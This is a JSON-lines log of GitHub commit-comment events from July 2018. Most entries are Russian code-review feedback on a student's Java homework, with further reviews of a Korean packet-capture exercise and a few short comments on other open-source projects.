{"id":"8034445155","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876208,"position":60,"line":60,"path":"firstmodul/homework1function/Task1.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:44:54Z","updated_at":"2018-07-29T18:44:54Z","author_association":"NONE","body":"switch должен иметь по код конвешену default контструкцию после всех case\r\n"}},"created_at":"2018-07-29T18:44:54Z"}
{"id":"8034445925","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"kjhk3082/pcap_test"},"payload":{"comment":{"id":29876212,"position":76,"line":50,"path":"main.cpp","commit_id":"99c44d0686719ad4c5cd4e03f41a9410d2c67f8e","created_at":"2018-07-29T18:45:28Z","updated_at":"2018-07-29T18:45:28Z","author_association":"NONE","body":"ETH 헤더 다음에 무조건 IP 헤더가 오는 것이 아닙니다. type 확인 요망\r\n"}},"created_at":"2018-07-29T18:45:28Z"}
{"id":"8034446065","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876213,"position":90,"line":90,"path":"firstmodul/homework1function/Task1.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:45:35Z","updated_at":"2018-07-29T18:45:35Z","author_association":"NONE","body":"написано криво, не понятно, почему обработка февраля идет отдельно от остальных. "}},"created_at":"2018-07-29T18:45:35Z"}
{"id":"8034446331","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29876217,"position":null,"line":null,"path":null,"commit_id":"2b7c1042af5bbad8918368d621214f280fcbe00a","created_at":"2018-07-29T18:45:46Z","updated_at":"2018-07-29T18:45:46Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [044 - Remover Optional de Todo o código](https://trello.com/c/feJk8Jav/52-044-remover-optional-de-todo-o-c%C3%B3digo)"}},"created_at":"2018-07-29T18:45:46Z"}
{"id":"8034446349","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876218,"position":100,"line":100,"path":"firstmodul/homework1function/Task1.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:45:46Z","updated_at":"2018-07-29T18:45:46Z","author_association":"NONE","body":"сразу return ( year % 4 == 0 && year % 100 != 0 ) || year % 400 == 0"}},"created_at":"2018-07-29T18:45:46Z"}
{"id":"8034446369","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"kjhk3082/pcap_test"},"payload":{"comment":{"id":29876219,"position":86,"line":60,"path":"main.cpp","commit_id":"99c44d0686719ad4c5cd4e03f41a9410d2c67f8e","created_at":"2018-07-29T18:45:47Z","updated_at":"2018-07-29T18:45:47Z","author_association":"NONE","body":"IP 헤더 다음에 무조건 TCP 헤더가 오는 것이 아닙니다. protocol 확인 요망."}},"created_at":"2018-07-29T18:45:47Z"}
{"id":"8034446623","type":"CommitCommentEvent","actor":{"login":"fauzipadlaw"},"repo":{"name":"husnilk/api-simpeg"},"payload":{"comment":{"id":29876220,"position":null,"line":null,"path":null,"commit_id":"d6a97002d3f8e62349d83a69f219168b5b10fa22","created_at":"2018-07-29T18:45:59Z","updated_at":"2018-07-29T18:45:59Z","author_association":"COLLABORATOR","body":"# Output\r\n![image](https://user-images.githubusercontent.com/15975922/43369507-f873815a-9399-11e8-80e5-5384eba7e480.png)\r\n\r\n![image](https://user-images.githubusercontent.com/15975922/43369512-1244f2b2-939a-11e8-869a-686561ba76f9.png)\r\n\r\n![image](https://user-images.githubusercontent.com/15975922/43369517-289b51e6-939a-11e8-8b21-22dd4de23408.png)\r\n\r\n### Data not found response\r\n![image](https://user-images.githubusercontent.com/15975922/43369523-3e8a3008-939a-11e8-921b-0b9d2251a596.png)\r\n"}},"created_at":"2018-07-29T18:45:59Z"}
{"id":"8034446802","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876221,"position":56,"line":56,"path":"firstmodul/homework1function/Task2.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:46:07Z","updated_at":"2018-07-29T18:46:07Z","author_association":"NONE","body":"написано невероятно сложно, выноси в отдельные функции"}},"created_at":"2018-07-29T18:46:07Z"}
{"id":"8034447040","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876222,"position":51,"line":51,"path":"firstmodul/homework1function/Task2.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:46:16Z","updated_at":"2018-07-29T18:46:16Z","author_association":"NONE","body":"после else - скобочки"}},"created_at":"2018-07-29T18:46:16Z"}
{"id":"8034447504","type":"CommitCommentEvent","actor":{"login":"aandroide"},"repo":{"name":"shivasiddharth/GassistPi"},"payload":{"comment":{"id":29876224,"position":null,"line":null,"path":null,"commit_id":"ed90b8c7ac1fd1e6a057877ffb0ea84a4ccced4d","created_at":"2018-07-29T18:46:36Z","updated_at":"2018-07-29T18:46:36Z","author_association":"CONTRIBUTOR","body":"\r\nhi sid, I noticed a bug, I asked to play a song and the first time the stopbutton worked by stopping the music.\r\nI requested a second time to play a song and the stopbutton does not work.\r\nI restarted and did the same joke, the first time it worked and the second time no."}},"created_at":"2018-07-29T18:46:36Z"}
{"id":"8034447871","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876227,"position":25,"line":25,"path":"firstmodul/homework1function/Task3.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:46:52Z","updated_at":"2018-07-29T18:46:52Z","author_association":"NONE","body":"зачем заходить и проверять в каждый if? Использовать if -else"}},"created_at":"2018-07-29T18:46:52Z"}
{"id":"8034448060","type":"CommitCommentEvent","actor":{"login":"HollandAsh"},"repo":{"name":"githubschool/open-enrollment-classes-introduction-to-github"},"payload":{"comment":{"id":29876228,"position":null,"line":null,"path":null,"commit_id":"1f8d852764d2d999e739cfcaa0dd8ade8145b829","created_at":"2018-07-29T18:47:01Z","updated_at":"2018-07-29T18:47:01Z","author_association":"COLLABORATOR","body":"closes #19824 "}},"created_at":"2018-07-29T18:47:01Z"}
{"id":"8034448232","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876229,"position":47,"line":47,"path":"firstmodul/homework1function/Task3.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:47:08Z","updated_at":"2018-07-29T18:47:08Z","author_association":"NONE","body":"сразу return discrimenant > 0"}},"created_at":"2018-07-29T18:47:08Z"}
{"id":"8034449313","type":"CommitCommentEvent","actor":{"login":"HollandAsh"},"repo":{"name":"githubschool/open-enrollment-classes-introduction-to-github"},"payload":{"comment":{"id":29876238,"position":2,"line":2,"path":"_pins/HollandAsh.json","commit_id":"1f8d852764d2d999e739cfcaa0dd8ade8145b829","created_at":"2018-07-29T18:47:53Z","updated_at":"2018-07-29T18:47:53Z","author_association":"COLLABORATOR","body":"closes #19824"}},"created_at":"2018-07-29T18:47:53Z"}
{"id":"8034449574","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876241,"position":12,"line":12,"path":"firstmodul/homework2fori/Task1.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:48:05Z","updated_at":"2018-07-29T18:48:05Z","author_association":"NONE","body":"все выносим в функции, main только для тестирования"}},"created_at":"2018-07-29T18:48:05Z"}
{"id":"8034449819","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"kjhk3082/pcap_test"},"payload":{"comment":{"id":29876243,"position":96,"line":70,"path":"main.cpp","commit_id":"99c44d0686719ad4c5cd4e03f41a9410d2c67f8e","created_at":"2018-07-29T18:48:14Z","updated_at":"2018-07-29T18:48:14Z","author_association":"NONE","body":"54이상 70이하이면 16바이트가 아니라 17바이트 아닌가요?\r\n\r\n실제 TCP Data의 크기가 16바이트 미만인데 전부 출력하면 buffer overflow입니다. min(실제 TCP Data의 크기, 16) 값만큼 for문으로 돌리시기 바랍니다."}},"created_at":"2018-07-29T18:48:14Z"}
{"id":"8034450194","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876244,"position":15,"line":15,"path":"firstmodul/homework2fori/Task2.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:48:31Z","updated_at":"2018-07-29T18:48:31Z","author_association":"NONE","body":"скобочки везде пишем, даже если одна констукция! читаем внимательно код конвешен"}},"created_at":"2018-07-29T18:48:31Z"}
{"id":"8034450903","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876251,"position":20,"line":20,"path":"firstmodul/homework2fori/Task3.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:49:06Z","updated_at":"2018-07-29T18:49:06Z","author_association":"NONE","body":"достаточно один тип данных перевести в double"}},"created_at":"2018-07-29T18:49:06Z"}
{"id":"8034452024","type":"CommitCommentEvent","actor":{"login":"double-beep"},"repo":{"name":"double-beep/Stockfish"},"payload":{"comment":{"id":29876258,"position":null,"line":null,"path":null,"commit_id":"0b19dfd3c62937f82f5bd52f57f198300a12052c","created_at":"2018-07-29T18:49:59Z","updated_at":"2018-07-29T18:49:59Z","author_association":"OWNER","body":"Thanks a lot!"}},"created_at":"2018-07-29T18:49:59Z"}
{"id":"8034452032","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876259,"position":16,"line":16,"path":"firstmodul/homework2fori/Task2.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:50:00Z","updated_at":"2018-07-29T18:50:00Z","author_association":"NONE","body":"не вижу цикла, только решение через рекурсию"}},"created_at":"2018-07-29T18:50:00Z"}
{"id":"8034452285","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876260,"position":12,"line":12,"path":"firstmodul/homework3arrays/Task1.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:50:12Z","updated_at":"2018-07-29T18:50:12Z","author_association":"NONE","body":"опять нет выноса в отдельные функции"}},"created_at":"2018-07-29T18:50:12Z"}
{"id":"8034452564","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876261,"position":5,"line":5,"path":"firstmodul/homework3arrays/Task1.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:50:26Z","updated_at":"2018-07-29T18:50:26Z","author_association":"NONE","body":"что за , в конце? писать корректно"}},"created_at":"2018-07-29T18:50:26Z"}
{"id":"8034453299","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876265,"position":15,"line":15,"path":"firstmodul/homework3arrays/Task2.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:51:03Z","updated_at":"2018-07-29T18:51:03Z","author_association":"NONE","body":"разбивать на две отдельные функции по алгоритму и по выводу на печать, и вызывать их из main"}},"created_at":"2018-07-29T18:51:03Z"}
{"id":"8034454274","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876269,"position":16,"line":16,"path":"firstmodul/homework3arrays/Task3.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:51:49Z","updated_at":"2018-07-29T18:51:49Z","author_association":"NONE","body":"давать нормальные название переменным, а не mas1, mas2m qm w"}},"created_at":"2018-07-29T18:51:49Z"}
{"id":"8034454716","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876270,"position":16,"line":16,"path":"firstmodul/homework3arrays/Task3.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:52:10Z","updated_at":"2018-07-29T18:52:10Z","author_association":"NONE","body":"не корректно будет работать с разными массивами"}},"created_at":"2018-07-29T18:52:10Z"}
{"id":"8034455294","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876271,"position":25,"line":25,"path":"firstmodul/homework3arrays/Task4.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:52:37Z","updated_at":"2018-07-29T18:52:37Z","author_association":"NONE","body":"разбивать на 2 отдельные функции - одна  по расчет размера массива"}},"created_at":"2018-07-29T18:52:37Z"}
{"id":"8034456372","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876278,"position":16,"line":16,"path":"firstmodul/homework4string/Task1.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:53:27Z","updated_at":"2018-07-29T18:53:27Z","author_association":"NONE","body":"вообще ничего не выносишь в отдельные функции, даже по заданию просилось"}},"created_at":"2018-07-29T18:53:27Z"}
{"id":"8034456906","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876281,"position":47,"line":47,"path":"firstmodul/homework4string/Task2.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:53:52Z","updated_at":"2018-07-29T18:53:52Z","author_association":"NONE","body":"switch должен иметь по код конвешену default контструкцию после всех case\r\n"}},"created_at":"2018-07-29T18:53:52Z"}
{"id":"8034457600","type":"CommitCommentEvent","actor":{"login":"thegreatpolo"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":29876283,"position":null,"line":null,"path":null,"commit_id":"b230d20619c2e6bf769a765fa238486fd3b9a003","created_at":"2018-07-29T18:54:25Z","updated_at":"2018-07-29T18:54:25Z","author_association":"NONE","body":"I have spent some time on an issue I had with this version of the code. The app crashes anytime the I tried to save a pet without entering a weight. Plus the message showed that the pet was added correctly even if I did not add a name (instead of giving me the error message). After a little while of struggling, I figured something important.\r\nThe NOT NULL restraint in SQLite works only if the field is null (which apparently means you don't provide any argument). On the other side, after the use of the trim() method in java, if the user gave no input, java will give \"\". But \"\" is an empty string, not a null string. So if you give that to SQLite, it will think the name for example is \"\".\r\nI managed to fix this by adding:\r\n```\r\n//Fixing some issues here\r\n        int weight =0;\r\n        if (nameString.equals(\"\")) {\r\n            nameString = null;\r\n        }\r\n        if (breedString.equals(\"\")) {\r\n            breedString = null;\r\n        }\r\n        if (!weightString.equals(\"\")) {\r\n            weight = Integer.parseInt(weightString);\r\n        }\r\n```\r\nThis also prevents the problem with parsing the weight, that you have to set by default to 0 in Java.\r\nI would be curious to see if some people managed to address the issue in a different manner ! "}},"created_at":"2018-07-29T18:54:25Z"}
{"id":"8034457756","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876284,"position":3,"line":3,"path":"firstmodul/homework5oop/Point.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:54:32Z","updated_at":"2018-07-29T18:54:32Z","author_association":"NONE","body":"отступ между классом и полями"}},"created_at":"2018-07-29T18:54:32Z"}
{"id":"8034458028","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876285,"position":30,"line":30,"path":"firstmodul/homework5oop/Point.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:54:45Z","updated_at":"2018-07-29T18:54:45Z","author_association":"NONE","body":"сразу return без локальных переменных"}},"created_at":"2018-07-29T18:54:45Z"}
{"id":"8034458316","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876287,"position":11,"line":11,"path":"firstmodul/homework5oop/Rectangle.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:54:58Z","updated_at":"2018-07-29T18:54:58Z","author_association":"NONE","body":"а тут зачем лишние отступы?"}},"created_at":"2018-07-29T18:54:58Z"}
{"id":"8034459492","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876290,"position":3,"line":3,"path":"firstmodul/homework6inherit/Circle.java","commit_id":"fc6ccbdeefe37559dbdf696b6c62d139d2b00a62","created_at":"2018-07-29T18:55:44Z","updated_at":"2018-07-29T18:55:44Z","author_association":"NONE","body":"окружность является точкой? неправильно использовано наследование"}},"created_at":"2018-07-29T18:55:44Z"}
{"id":"8034459808","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876295,"position":33,"line":33,"path":"firstmodul/homework6inherit/Circle.java","commit_id":"fc6ccbdeefe37559dbdf696b6c62d139d2b00a62","created_at":"2018-07-29T18:55:57Z","updated_at":"2018-07-29T18:55:57Z","author_association":"NONE","body":"код не форматируешь совсем"}},"created_at":"2018-07-29T18:55:57Z"}
{"id":"8034460112","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876296,"position":31,"line":31,"path":"firstmodul/homework6inherit/Circle.java","commit_id":"fc6ccbdeefe37559dbdf696b6c62d139d2b00a62","created_at":"2018-07-29T18:56:11Z","updated_at":"2018-07-29T18:56:11Z","author_association":"NONE","body":"не нужны здесь скобочки вокруг всего выражение, ухудшает читабильность"}},"created_at":"2018-07-29T18:56:11Z"}
{"id":"8034460831","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876300,"position":3,"line":3,"path":"firstmodul/homework6inherit/DiagonalOfFigure.java","commit_id":"fc6ccbdeefe37559dbdf696b6c62d139d2b00a62","created_at":"2018-07-29T18:56:41Z","updated_at":"2018-07-29T18:56:41Z","author_association":"NONE","body":"отступ между интерфейсом и методами"}},"created_at":"2018-07-29T18:56:41Z"}
{"id":"8034461610","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876302,"position":31,"line":31,"path":"firstmodul/homework6inherit/Ellipse.java","commit_id":"fc6ccbdeefe37559dbdf696b6c62d139d2b00a62","created_at":"2018-07-29T18:57:14Z","updated_at":"2018-07-29T18:57:14Z","author_association":"NONE","body":"не кажется странным переписывать код, который идентичен тому, что написано в базовом?"}},"created_at":"2018-07-29T18:57:14Z"}
{"id":"8034462960","type":"CommitCommentEvent","actor":{"login":"double-beep"},"repo":{"name":"Counterply/asmFish"},"payload":{"comment":{"id":29876307,"position":8,"line":1458,"path":"x86/SearchMacros.asm","commit_id":"1bf7829e68602a267498b1261a81f5c85349e3a2","created_at":"2018-07-29T18:58:12Z","updated_at":"2018-07-29T18:58:12Z","author_association":"NONE","body":"@Counterply what I tried was to reset `eax` register (or whatever as I learnt this word only in my language and I hope it is correct) after\r\n```\r\ncmovns  eax, dword[rbx + State.statScore]\r\n```\r\nby\r\n```\r\nxor  eax, eax\r\n```\r\nwhich also gives the correct bench. But I really think that this is better as it **cleans** code; aa very important thing.\r\nNow, Stockfish's team implements lots of functional patches whick means lots of work."}},"created_at":"2018-07-29T18:58:12Z"}
{"id":"8034463054","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876308,"position":42,"line":42,"path":"firstmodul/homework6inherit/Point.java","commit_id":"fc6ccbdeefe37559dbdf696b6c62d139d2b00a62","created_at":"2018-07-29T18:58:16Z","updated_at":"2018-07-29T18:58:16Z","author_association":"NONE","body":"откуда площать у точки?"}},"created_at":"2018-07-29T18:58:16Z"}
{"id":"8034463258","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876309,"position":46,"line":46,"path":"firstmodul/homework6inherit/Point.java","commit_id":"fc6ccbdeefe37559dbdf696b6c62d139d2b00a62","created_at":"2018-07-29T18:58:24Z","updated_at":"2018-07-29T18:58:24Z","author_association":"NONE","body":"не должно быть такого метода у точки"}},"created_at":"2018-07-29T18:58:24Z"}
{"id":"8034463714","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876310,"position":43,"line":43,"path":"firstmodul/homework6inherit/Rectangle.java","commit_id":"fc6ccbdeefe37559dbdf696b6c62d139d2b00a62","created_at":"2018-07-29T18:58:47Z","updated_at":"2018-07-29T18:58:47Z","author_association":"NONE","body":"класс вообще такое ощущение, что был скопирован откуда-то и вставлен сюда, никакого форматирования"}},"created_at":"2018-07-29T18:58:47Z"}
{"id":"8034463744","type":"CommitCommentEvent","actor":{"login":"czlee"},"repo":{"name":"TabbycatDebate/tabbycat"},"payload":{"comment":{"id":29876311,"position":7,"line":151,"path":"tabbycat/utils/tables.py","commit_id":"4bedcfc036ecc0e4cbd1ed01e053c23f2774c846","created_at":"2018-07-29T18:58:48Z","updated_at":"2018-07-29T18:58:48Z","author_association":"MEMBER","body":"@philipbelesky We used to distinguish between solo judges and chairs of panels; do I take it we no longer want to do this? So the \"only\" indicator is now only used on printed scoresheets?"}},"created_at":"2018-07-29T18:58:48Z"}
{"id":"8034464822","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876313,"position":18,"line":18,"path":"firstmodul/homework6inherit/Triangle.java","commit_id":"fc6ccbdeefe37559dbdf696b6c62d139d2b00a62","created_at":"2018-07-29T18:59:33Z","updated_at":"2018-07-29T18:59:33Z","author_association":"NONE","body":"зачем держать поля, которые легко рассчитываются на основании остальных? такого быть не должно"}},"created_at":"2018-07-29T18:59:33Z"}
{"id":"8034465541","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876320,"position":19,"line":19,"path":"firstmodul/homework7list/task1/Task1.java","commit_id":"fc6ccbdeefe37559dbdf696b6c62d139d2b00a62","created_at":"2018-07-29T19:00:05Z","updated_at":"2018-07-29T19:00:05Z","author_association":"NONE","body":"никакого хардкода и магических чисел, все выносим в константы"}},"created_at":"2018-07-29T19:00:05Z"}
{"id":"8034465666","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876323,"position":23,"line":23,"path":"firstmodul/homework7list/task1/Task1.java","commit_id":"fc6ccbdeefe37559dbdf696b6c62d139d2b00a62","created_at":"2018-07-29T19:00:10Z","updated_at":"2018-07-29T19:00:10Z","author_association":"NONE","body":"\r\nв методе main только проверка написанного, все остальное выносим в отдельные классы (утилитные например)"}},"created_at":"2018-07-29T19:00:10Z"}
{"id":"8034468308","type":"CommitCommentEvent","actor":{"login":"so0p"},"repo":{"name":"so0p/gcc-motor-control"},"payload":{"comment":{"id":29876337,"position":null,"line":null,"path":null,"commit_id":"1106dfafcfdcedafbbe5cf2ef006fa184d9f73a6","created_at":"2018-07-29T19:01:51Z","updated_at":"2018-07-29T19:01:51Z","author_association":"OWNER","body":"Can you organize each function into seperate classes? Create a .h and .cpp for each seperate function and put them into a libraries folder alongside gcc-motor-control.ino."}},"created_at":"2018-07-29T19:01:51Z"}
{"id":"8034468439","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876338,"position":35,"line":35,"path":"firstmodul/homework7list/task2/Task2.java","commit_id":"fc6ccbdeefe37559dbdf696b6c62d139d2b00a62","created_at":"2018-07-29T19:01:56Z","updated_at":"2018-07-29T19:01:56Z","author_association":"NONE","body":"не нашел поиск студента через итератор"}},"created_at":"2018-07-29T19:01:56Z"}
{"id":"8034468860","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876339,"position":53,"line":53,"path":"firstmodul/homework6inherit/Triangle.java","commit_id":"fc6ccbdeefe37559dbdf696b6c62d139d2b00a62","created_at":"2018-07-29T19:02:15Z","updated_at":"2018-07-29T19:02:15Z","author_association":"NONE","body":"не нашел ShapeUtils класса"}},"created_at":"2018-07-29T19:02:15Z"}
{"id":"8034469815","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876341,"position":3,"line":3,"path":"firstmodul/homework6inherit/ShapeUtils.java","commit_id":"fc6ccbdeefe37559dbdf696b6c62d139d2b00a62","created_at":"2018-07-29T19:02:54Z","updated_at":"2018-07-29T19:02:54Z","author_association":"NONE","body":"утилитный класс final и private конструктор"}},"created_at":"2018-07-29T19:02:54Z"}
{"id":"8034470510","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876345,"position":10,"line":10,"path":"firstmodul/homework6inherit/ShapeUtils.java","commit_id":"fc6ccbdeefe37559dbdf696b6c62d139d2b00a62","created_at":"2018-07-29T19:03:27Z","updated_at":"2018-07-29T19:03:27Z","author_association":"NONE","body":"некорректные проверки, наследники ведь могут быть и т.д."}},"created_at":"2018-07-29T19:03:27Z"}
{"id":"8034470744","type":"CommitCommentEvent","actor":{"login":"athas"},"repo":{"name":"diku-dk/futhark-docbot"},"payload":{"comment":{"id":29876348,"position":null,"line":null,"path":null,"commit_id":"2ec75703367e1acf51a8a411b5aa45240a78fdc9","created_at":"2018-07-29T19:03:37Z","updated_at":"2018-07-29T19:03:37Z","author_association":"MEMBER","body":"Not bad! "}},"created_at":"2018-07-29T19:03:37Z"}
{"id":"8034471961","type":"CommitCommentEvent","actor":{"login":"dr-j"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29876351,"position":5,"line":5,"path":"sql/updates/world/3.3.5/2018_07_29_00_world_335.sql","commit_id":"08c079eb3a668ff8f05762947554a416449c5876","created_at":"2018-07-29T19:04:30Z","updated_at":"2018-07-29T19:04:30Z","author_association":"CONTRIBUTOR","body":"In"}},"created_at":"2018-07-29T19:04:30Z"}
{"id":"8034472113","type":"CommitCommentEvent","actor":{"login":"hyejin106"},"repo":{"name":"hyejin106/pcap_test"},"payload":{"comment":{"id":29876353,"position":49,"line":49,"path":"main.cpp","commit_id":"168cdd63ab964827e05fe4cd7efc348a368ef894","created_at":"2018-07-29T19:04:36Z","updated_at":"2018-07-29T19:04:36Z","author_association":"OWNER","body":"Done in https://github.com/hyejin106/pcap_test/commit/b848819a9d1704ec942519de0558ee95a2a22ff5#diff-118fcbaaba162ba17933c7893247df3a"}},"created_at":"2018-07-29T19:04:36Z"}
{"id":"8034472268","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29876355,"position":null,"line":null,"path":null,"commit_id":"7c600bfd314800d604efbc3dce116afc5804c337","created_at":"2018-07-29T19:04:43Z","updated_at":"2018-07-29T19:04:43Z","author_association":"CONTRIBUTOR","body":"Not in that file."}},"created_at":"2018-07-29T19:04:43Z"}
{"id":"8034472718","type":"CommitCommentEvent","actor":{"login":"hyejin106"},"repo":{"name":"hyejin106/pcap_test"},"payload":{"comment":{"id":29876359,"position":63,"line":63,"path":"main.cpp","commit_id":"168cdd63ab964827e05fe4cd7efc348a368ef894","created_at":"2018-07-29T19:05:02Z","updated_at":"2018-07-29T19:05:02Z","author_association":"OWNER","body":"Done in https://github.com/hyejin106/pcap_test/commit/002a76150aca77fcfacc7c2ba98c2a0673670b33#diff-118fcbaaba162ba17933c7893247df3a"}},"created_at":"2018-07-29T19:05:02Z"}
